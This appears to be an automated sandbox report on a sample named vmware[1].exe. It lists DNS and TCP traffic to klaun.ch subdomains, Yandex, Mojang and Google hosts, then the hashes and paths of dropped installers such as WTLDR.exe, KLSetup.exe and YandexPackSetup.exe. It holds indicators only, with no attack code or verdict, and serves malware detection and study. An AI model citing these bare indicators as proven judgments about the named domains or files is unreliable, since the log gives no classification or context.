US 8.8.8.8:53 183.192.45.5.in-addr.arpa udp
US 8.8.8.8:53 51.247.45.5.in-addr.arpa udp
US 8.8.8.8:53 226.20.18.104.in-addr.arpa udp
US 8.8.8.8:53 dl.klaun.ch udp
US 172.67.69.202:80 dl.klaun.ch tcp
US 8.8.8.8:53 202.69.67.172.in-addr.arpa udp
US 8.8.8.8:53 161.19.199.152.in-addr.arpa udp
US 8.8.8.8:53 clck.yandex.ru udp
RU 87.250.251.14:80 clck.yandex.ru tcp
US 8.8.8.8:53 14.251.250.87.in-addr.arpa udp
FR 88.168.211.65:6522 tcp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 65.211.168.88.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
RU 87.250.251.14:80 clck.yandex.ru tcp
RU 77.88.21.14:80 clck.yandex.ru tcp
US 8.8.8.8:53 soft.export.yandex.ru udp
RU 87.250.254.20:80 soft.export.yandex.ru tcp
US 8.8.8.8:53 14.21.88.77.in-addr.arpa udp
US 8.8.8.8:53 20.254.250.87.in-addr.arpa udp
RU 5.45.205.242:80 downloader.yandex.net tcp
NL 5.45.247.53:80 cachev2-ams03.cdn.yandex.net tcp
RU 87.250.251.14:80 clck.yandex.ru tcp
US 8.8.8.8:53 api.browser.yandex.net udp
US 8.8.8.8:53 api.browser.yandex.ru udp
US 8.8.8.8:53 download.cdn.yandex.net udp
RU 213.180.193.234:443 api.browser.yandex.ru tcp
RU 213.180.193.234:443 api.browser.yandex.ru tcp
RU 5.45.205.242:443 download.cdn.yandex.net tcp
RU 213.180.193.234:443 api.browser.yandex.ru tcp
US 8.8.8.8:53 234.193.180.213.in-addr.arpa udp
US 8.8.8.8:53 cachev2-kiv03.cdn.yandex.net udp
RU 5.45.192.185:443 cachev2-kiv03.cdn.yandex.net tcp
US 8.8.8.8:53 185.192.45.5.in-addr.arpa udp
US 8.8.8.8:53 api.klaun.ch udp
US 104.26.11.58:80 api.klaun.ch tcp
RU 213.180.193.234:443 api.browser.yandex.ru tcp
RU 213.180.193.234:443 api.browser.yandex.ru tcp
US 104.26.11.58:80 api.klaun.ch tcp
US 104.26.11.58:80 api.klaun.ch tcp
US 104.26.11.58:80 api.klaun.ch tcp
US 8.8.8.8:53 repos.klaun.ch udp
US 172.67.69.202:443 repos.klaun.ch tcp
US 172.67.69.202:443 repos.klaun.ch tcp
US 172.67.69.202:443 repos.klaun.ch tcp
US 172.67.69.202:443 repos.klaun.ch tcp
US 172.67.69.202:443 repos.klaun.ch tcp
US 172.67.69.202:443 repos.klaun.ch tcp
US 172.67.69.202:443 repos.klaun.ch tcp
US 172.67.69.202:443 repos.klaun.ch tcp
US 172.67.69.202:443 repos.klaun.ch tcp
US 172.67.69.202:443 repos.klaun.ch tcp
US 172.67.69.202:443 repos.klaun.ch tcp
US 172.67.69.202:443 repos.klaun.ch tcp
US 172.67.69.202:443 repos.klaun.ch tcp
US 172.67.69.202:443 repos.klaun.ch tcp
US 172.67.69.202:443 repos.klaun.ch tcp
US 172.67.69.202:443 repos.klaun.ch tcp
US 172.67.69.202:443 repos.klaun.ch tcp
US 172.67.69.202:443 repos.klaun.ch tcp
US 172.67.69.202:443 repos.klaun.ch tcp
RU 213.180.193.234:443 api.browser.yandex.ru tcp
US 8.8.8.8:53 101.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 23.149.64.172.in-addr.arpa udp
US 104.26.11.58:80 repos.klaun.ch tcp
US 172.67.69.202:80 repos.klaun.ch tcp
US 104.26.11.58:80 repos.klaun.ch tcp
US 104.26.11.58:80 repos.klaun.ch tcp
US 8.8.8.8:53 cf.klaun.ch udp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:80 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 8.8.8.8:53 fabric.klaun.ch udp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
RU 213.180.193.234:443 api.browser.yandex.ru tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
FR 88.168.211.65:6522 tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:80 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 8.8.8.8:53 quilt.klaun.ch udp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
RU 213.180.193.234:443 api.browser.yandex.ru tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:80 quilt.klaun.ch tcp
US 104.26.11.58:80 quilt.klaun.ch tcp
US 104.26.11.58:80 quilt.klaun.ch tcp
US 8.8.8.8:53 api.mojang.com udp
US 13.107.246.64:443 api.mojang.com tcp
RU 213.180.193.234:443 api.browser.yandex.ru tcp
US 8.8.8.8:53 storage.ape.yandex.net udp
US 13.107.246.64:443 api.mojang.com tcp
RU 213.180.193.234:443 api.browser.yandex.ru tcp
RU 87.250.251.66:443 storage.ape.yandex.net tcp
US 13.107.246.64:443 api.mojang.com tcp
US 13.107.246.64:443 api.mojang.com tcp
US 8.8.8.8:53 sba.yandex.net udp
US 8.8.8.8:53 sba.yandex.net udp
US 8.8.8.8:53 update.googleapis.com udp
US 8.8.8.8:53 update.googleapis.com udp
US 8.8.8.8:53 sovetnik.market.yandex.ru udp
US 8.8.8.8:53 sovetnik.market.yandex.ru udp
US 8.8.8.8:53 browser.yandex.ru udp
US 8.8.8.8:53 browser.yandex.ru udp
GB 216.58.204.67:443 update.googleapis.com tcp
RU 213.180.204.232:443 sba.yandex.net tcp
RU 93.158.134.121:443 browser.yandex.ru tcp
US 8.8.8.8:53 api.browser.yandex.net udp
US 8.8.8.8:53 api.browser.yandex.net udp
RU 213.180.193.234:443 api.browser.yandex.net tcp
US 8.8.8.8:53 storage.ape.yandex.net udp
US 8.8.8.8:53 storage.ape.yandex.net udp
RU 213.180.204.232:443 sba.yandex.net tcp
US 8.8.8.8:53 api.browser.yandex.ru udp
US 8.8.8.8:53 api.browser.yandex.ru udp
RU 87.250.251.66:443 storage.ape.yandex.net tcp
US 8.8.8.8:53 browser-resources.s3.yandex.net udp
US 8.8.8.8:53 browser-resources.s3.yandex.net udp
RU 93.158.134.158:443 browser-resources.s3.yandex.net tcp
RU 87.250.251.66:443 storage.ape.yandex.net tcp
US 8.8.8.8:53 browser-resources.s3.yandex.net udp
US 8.8.8.8:53 browser-resources.s3.yandex.net udp
US 8.8.8.8:53 sovetnik.market.yandex.ru udp
RU 87.250.250.41:443 sovetnik.market.yandex.ru tcp
US 8.8.8.8:53 67.204.58.216.in-addr.arpa udp
US 8.8.8.8:53 232.204.180.213.in-addr.arpa udp
US 8.8.8.8:53 121.134.158.93.in-addr.arpa udp
US 8.8.8.8:53 123.35.104.34.in-addr.arpa udp
US 8.8.8.8:53 158.134.158.93.in-addr.arpa udp
RU 213.180.204.232:443 sba.yandex.net tcp
US 8.8.8.8:53 cdnrepfu6rku5qba3zpu.svc.cdn.yandex.net udp
US 8.8.8.8:53 cdnrepfu6rku5qba3zpu.svc.cdn.yandex.net udp
RU 37.9.64.225:443 cdnrepfu6rku5qba3zpu.svc.cdn.yandex.net tcp
RU 93.158.134.121:443 browser.yandex.ru tcp
US 8.8.8.8:53 yastatic.net udp
US 8.8.8.8:53 yastatic.net udp
RU 178.154.131.217:443 yastatic.net tcp
RU 178.154.131.217:443 yastatic.net tcp
RU 178.154.131.217:443 yastatic.net tcp
RU 178.154.131.217:443 yastatic.net tcp
RU 178.154.131.217:443 yastatic.net tcp
RU 178.154.131.217:443 yastatic.net tcp
RU 178.154.131.217:443 yastatic.net tcp
RU 178.154.131.217:443 yastatic.net tcp
RU 178.154.131.217:443 yastatic.net tcp
RU 178.154.131.217:443 yastatic.net tcp
RU 178.154.131.217:443 yastatic.net tcp
RU 178.154.131.217:443 yastatic.net tcp
RU 178.154.131.217:443 yastatic.net tcp
US 8.8.8.8:53 webntp.yandex.ru udp
US 8.8.8.8:53 webntp.yandex.ru udp
US 8.8.8.8:53 yandex.ru udp
US 8.8.8.8:53 yandex.ru udp
US 8.8.8.8:53 browser-resources.s3.yandex.net udp
US 8.8.8.8:53 browser-resources.s3.yandex.net udp
RU 77.88.44.55:443 yandex.ru tcp
RU 93.158.134.158:443 browser-resources.s3.yandex.net tcp
RU 93.158.134.158:443 browser-resources.s3.yandex.net tcp
RU 93.158.134.158:443 browser-resources.s3.yandex.net tcp
RU 213.180.204.196:443 webntp.yandex.ru tcp
US 8.8.8.8:53 66.251.250.87.in-addr.arpa udp
US 8.8.8.8:53 41.250.250.87.in-addr.arpa udp
US 8.8.8.8:53 225.64.9.37.in-addr.arpa udp
US 8.8.8.8:53 217.131.154.178.in-addr.arpa udp
US 8.8.8.8:53 mc.yandex.ru udp
US 8.8.8.8:53 mc.yandex.ru udp
RU 93.158.134.119:443 mc.yandex.ru tcp
US 8.8.8.8:53 sessionserver.mojang.com udp
US 13.107.246.64:443 sessionserver.mojang.com tcp
US 8.8.8.8:53 uid.yandex.ru udp
US 8.8.8.8:53 uid.yandex.ru udp
US 8.8.8.8:53 api.browser.yandex.ru udp
US 8.8.8.8:53 api.browser.yandex.ru udp
US 8.8.8.8:53 sso.passport.yandex.ru udp
US 8.8.8.8:53 sso.passport.yandex.ru udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 55.44.88.77.in-addr.arpa udp
US 8.8.8.8:53 119.134.158.93.in-addr.arpa udp
US 8.8.8.8:53 196.204.180.213.in-addr.arpa udp
RU 213.180.193.234:443 api.browser.yandex.ru tcp
RU 213.180.193.234:443 api.browser.yandex.ru tcp
RU 87.250.254.216:443 uid.yandex.ru tcp
US 8.8.4.4:443 dns.google tcp
US 8.8.8.8:443 dns.google tcp
US 8.8.4.4:443 dns.google tcp
US 8.8.8.8:443 dns.google tcp
US 8.8.8.8:443 dns.google tcp
US 8.8.8.8:443 dns.google tcp
RU 93.158.134.144:443 sso.passport.yandex.ru tcp
RU 93.158.134.144:443 sso.passport.yandex.ru tcp
US 8.8.8.8:443 dns.google udp
RU 62.217.160.14:443 tcp
RU 93.158.134.144:443 sso.passport.yandex.ru tcp
US 8.8.8.8:53 4.4.8.8.in-addr.arpa udp
US 8.8.8.8:53 216.254.250.87.in-addr.arpa udp
US 8.8.8.8:53 144.134.158.93.in-addr.arpa udp
RU 213.180.193.234:443 api.browser.yandex.ru tcp
RU 213.180.193.234:443 api.browser.yandex.ru tcp
RU 213.180.193.234:443 api.browser.yandex.ru tcp
RU 213.180.193.234:443 api.browser.yandex.ru tcp
RU 213.180.193.234:443 api.browser.yandex.ru tcp
RU 213.180.193.234:443 api.browser.yandex.ru tcp
US 8.8.8.8:53 14.160.217.62.in-addr.arpa udp
RU 5.255.255.242:443 tcp
RU 213.180.193.234:443 api.browser.yandex.ru tcp
US 8.8.8.8:53 242.255.255.5.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
RU 178.154.131.215:443 yastatic.net tcp
RU 77.88.21.37:443 tcp
RU 213.180.204.158:443 tcp
RU 213.180.204.158:443 tcp
RU 213.180.204.158:443 tcp
RU 213.180.204.158:443 tcp
RU 213.180.204.158:443 tcp
RU 213.180.204.158:443 tcp
RU 213.180.193.234:443 api.browser.yandex.ru tcp
RU 213.180.193.234:443 api.browser.yandex.ru tcp
US 8.8.8.8:443 dns.google udp
RU 213.180.193.234:443 api.browser.yandex.ru tcp
US 8.8.8.8:53 215.131.154.178.in-addr.arpa udp
US 8.8.8.8:53 37.21.88.77.in-addr.arpa udp
US 8.8.8.8:53 158.204.180.213.in-addr.arpa udp
RU 77.88.55.88:443 yandex.ru tcp
US 8.8.8.8:53 88.55.88.77.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\7UY3WOJS\vmware[1].exe

MD5 68e634af1eafb17618018de02dd47be7
SHA1 bdc653c130d96a32edeb4f2bc48203432b448498
SHA256 2d316619d2522838df93cbb8392c4c3a053279d92e586ccd63431cadfbe7816d
SHA512 8220a64c8f89d0c30d42e5bfcf770a26422604ea37f48fbcade5679f42bfb474966203cb5bbd2f29f51e435f7f8e04e168e112b2ed3eb419a46536aa7b947071

memory/3864-15-0x00007FFCC1673000-0x00007FFCC1675000-memory.dmp

memory/3864-16-0x0000000000A10000-0x0000000000DE0000-memory.dmp

memory/3864-17-0x00007FFCC1670000-0x00007FFCC2131000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\WTLDR.exe

MD5 7a94013c17dc892cea16fbae38646e43
SHA1 8cf54c2ac961dd5c82cb3b07c3de317847aa94bb
SHA256 cd35af0a0c71c382760409b7b2343c83857d89af55a0b365b72962f0f9c9a400
SHA512 03df47db51270ca87172620e5475ce7a99e1fa1bd61e1956e4a0b28792d145b4e30d5b0d7b0737ea3ed331cecaecde78641b4828b1b9425153b1f9ac3de6f34a

memory/4116-29-0x000000006F7D2000-0x000000006F7D3000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\KLSetup.exe

MD5 65f0ee72fac85b324a0734053d436918
SHA1 796d3ab9803f5e6ec370ff948f654842af62fd25
SHA256 4f128c759e90606c9c7b5546259a7888b2aaaf5ea59d1aa40d5284056366504c
SHA512 b18d612652d2023b7ca49bf0008d6f6a77bab25c70fb9d67bd29c4a917344275c2fbe14058e8121e0ec3e2278ae100b66e49494aa63a2d2570d7d95b6c64ed52

memory/4116-39-0x000000006F7D0000-0x000000006FD81000-memory.dmp

memory/3864-40-0x00007FFCC1670000-0x00007FFCC2131000-memory.dmp

memory/4116-41-0x000000006F7D0000-0x000000006FD81000-memory.dmp

memory/1284-42-0x0000000000A80000-0x0000000000A81000-memory.dmp

memory/4116-52-0x000000006F7D0000-0x000000006FD81000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\yadl.exe

MD5 2b0d2f77d8abade07a3dd9a8152ad111
SHA1 e7c0ad498f361e3c2d5a0ffa225ee112ed3c5bdb
SHA256 85ddc30b6b53ebe529688528e74bcfd74df0b93ea29ee1693d7d9aeec4d48776
SHA512 d48a3b9d9d3f83f1b0498103ee1f78467dc84254c762227081ba3218bd2212c1e3c29d2d94737101d55f5793f3d7dca8bdedc7d527cdb701733a6cbc74c938fc

C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe

MD5 3fb846d3691f3d98a34e669e1b9b5bf6
SHA1 4c90c2912aae3b8da4c44a4faa0b8df20525285f
SHA256 ead7a779cabae642d09be07283cc99e53c84ecf90349444e0d0ac4bf9901fe47
SHA512 e904ecfa7b1c9ba066272bf91b8341bf3877310613370defabee7db58ea825c52582353e97f9398d706d3f3890b3701a1c05fe202e8a87499fb9600f87176b3e

C:\Users\Admin\AppData\Local\Temp\YandexSearch00000.log

MD5 b9760b39794e8f100dbbe16f50afa62f
SHA1 5433303238e92d66d0a390e4e37eba5c77c3799a
SHA256 970a367b703c6c91799b80c82273d6c3160e41cd02c9de293aca6ee240d7aaf8
SHA512 1f25acbc1ab1b286b1e766f9b8ca65990c66744d9d82f14a0f2c35fdcac52d81f40d48f11997edfd66994fd9a68996dfa25ae42f9083f2ea4dc654f79f050ee9

C:\Users\Admin\AppData\Local\Temp\{5B964E0E-B9A3-4276-9ED9-4D5A5720747A}\YandexSearch.msi

MD5 561f202d40eb1a21aa947b2b833f6928
SHA1 b48e2f49a416847aa9420ed4b360841e8c28f67b
SHA256 b2fda5fb2d8e65fc0448d308647d8afd1e4ecd7bff0103ec3700e0798a7db0a3
SHA512 66d172f336ef0b4790e2141711f205682a0ba6ced8d03f26e33b54f6ea1e29be10d387e843df26d1110559888b09a3cdf9198ea40f17ca9d2ac1872c1da82063

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\357F04AD41BCF5FE18FCB69F60C6680F_394487CAFBCFB8C5917AD7A10924C8A7

MD5 1468177f7f9dcf80975223275c67bc1d
SHA1 f944d670a602a9e7d2628d0570fbfee1062fc49a
SHA256 b77d9353851419c6adc1eb4288c734f9589bdf871525f87487990b3a4db5816f
SHA512 e0b076dd1f2b62bda3bb5ef29620cc711655ea976428ca7564c559e98b1f223e7f03d783649278d44113c4d1c406a58a9e3dce34f4b175dea0965e30cf859f7a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\357F04AD41BCF5FE18FCB69F60C6680F_394487CAFBCFB8C5917AD7A10924C8A7

MD5 4f5d956c5b4bd5351d2be965c67f361e
SHA1 229f5d2c9057853af96a7c01a874f8453e1a3d3f
SHA256 9e93c11504999e78b5508b08fc0a984a5b64248be5bae474632238a35811da01
SHA512 c5b7eed9c1d4ffd66dc4e54b97e78d48dfaab8aa3094fb7587a4aed1b2881e69cf4c4b586f4ead024260308bf2d9c1b023a7c1f48c5373d9c337795066870b91

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\9CB4373A4252DE8D2212929836304EC5_1AB74AA2E3A56E1B8AD8D3FEC287554E

MD5 453e545f12ef9e011e989a2b63e92ac9
SHA1 558a9ab9f8e6a8c4fceb4dfd67d01edc90a93393
SHA256 43fb7de5ca016b1777db62838fbcf59d0ea40b63c5ac41a11400d31f23a34469
SHA512 3644bc2c4e78f88baefbc1640b4cea67772f40e3b306542bcff581fd9c96264b3f6c9b5cbdbae50af373a56d50d444d46c3a5b2317880a6a257a59528f7c7091

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9CB4373A4252DE8D2212929836304EC5_1AB74AA2E3A56E1B8AD8D3FEC287554E

MD5 e73658a9b3672f2ce712365fef373306
SHA1 3f268986e566e39340e0baa0ea80ad1ee9c3c589
SHA256 87e6f70b31ee8800c5cd1d9293ab8ee72e3707ec51ec96d72712f4d07f242a9c
SHA512 2f0e2f8417136bbf156eed1b3704d7f8ad688aa81bcbdd9f20850fcdde81fea786ee03aa1236fadeef7b864d7840fa1d83f83a5ab016f49fe89217b31d258cae

C:\Windows\Installer\MSI53C8.tmp

MD5 0c80a997d37d930e7317d6dac8bb7ae1
SHA1 018f13dfa43e103801a69a20b1fab0d609ace8a5
SHA256 a5dd2f97c6787c335b7807ff9b6966877e9dd811f9e26326837a7d2bd224de86
SHA512 fe1caef6d727344c60df52380a6e4ab90ae1a8eb5f96d6054eced1b7734357ce080d944fa518cf1366e14c4c0bd9a41db679738a860800430034a75bb90e51a5

C:\Windows\Installer\MSI54A4.tmp

MD5 e6fd0e66cf3bfd3cc04a05647c3c7c54
SHA1 6a1b7f1a45fb578de6492af7e2fede15c866739f
SHA256 669cc0aae068ced3154acaecb0c692c4c5e61bc2ca95b40395a3399e75fcb9b2
SHA512 fc8613f31acaf6155852d3ad6130fc3b76674b463dcdcfcd08a3b367dfd9e5b991e3f0a26994bcaf42f9e863a46a81e2520e77b1d99f703bcb08800bdca4efcb

C:\Users\Admin\AppData\Local\Temp\vendor00000.xml

MD5 a96e6071a17b74bbd309bf696496b8f7
SHA1 63c1ecf860504d390b6f3a32982ddd8946b042c5
SHA256 1a855972dc308e47d30d567e1b37fdad349bf555b971bc14ead76e17a8accccc
SHA512 2c906e2f11d62d1336be482cc5ff784bf372cc7afb3263754e7810a1ae27e253aa9e22463456b62a25049d33ba1e69f129ed7e0a0273fe928dcaa216b7876449

C:\Users\Admin\AppData\Local\Temp\E6E36528-865A-4F67-A4B6-616A6EA2DAD6\lite_installer.exe

MD5 aafdfaa7a989ddb216510fc9ae5b877f
SHA1 41cf94692968a7d511b6051b7fe2b15c784770cb
SHA256 688d0b782437ccfae2944281ade651a2da063f222e80b3510789dbdce8b00fdc
SHA512 6e2b76ff6df79c6de6887cf739848d05c894fbd70dc9371fff95e6ccd9938d695c46516cb18ec8edd01e78cad1a6029a3d633895f7ddba4db4bf9cd39271bd44

C:\Users\Admin\AppData\Local\Temp\45FA5734-C188-4A17-BD53-A04B9DCA00A5\seederexe.exe

MD5 225ba20fa3edd13c9c72f600ff90e6cb
SHA1 5f1a9baa85c2afe29619e7cc848036d9174701e4
SHA256 35585d12899435e13e186490fcf1d270adbe3c74a1e0578b3d9314858bf2d797
SHA512 97e699cffe28d3c3611570d341ccbc1a0f0eec233c377c70e0e20d4ed3b956b6fe200a007f7e601a5724e733c97eaddc39d308b9af58d45f7598f10038d94ab3

C:\Users\Admin\AppData\Local\Temp\clids-yasearch.xml

MD5 42f904227d6a52fb123a1cbae34f3373
SHA1 c0f5cfee6915bf65601aed5c662e1696f2b45fa0
SHA256 c25e6de10909a6c4a45a4e1e93d0eff1b3604cc515cc6ef2ae6b083ffe41a200
SHA512 b4c8dc57811b0c3d03f00a088bc16ed6eb02ed07db2a99681fd550b8a79e108b82053a3e4d9e12789b429a501bb06e8a684314322605eadcee7b9c633c13a669

memory/1284-205-0x0000000000D60000-0x00000000015A5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp696aaaaaa

MD5 fefc3d677388386c29d8720c15b9db3f
SHA1 370f1f40ae5c652d87b3b8f42e67d827af2b1754
SHA256 74d5e8d3cd8d659d8df8e6f306832dfc252e1a6e676bb60334e31b5943deb4fb
SHA512 b462ca1ffb0798bedc39c945daa75ff73e0efbb1c6dfdb262e6b2936158933f514f0b4169e811069df11aaeaebd39c826ce0caf9f6eb6d77de249fca6abe39fe

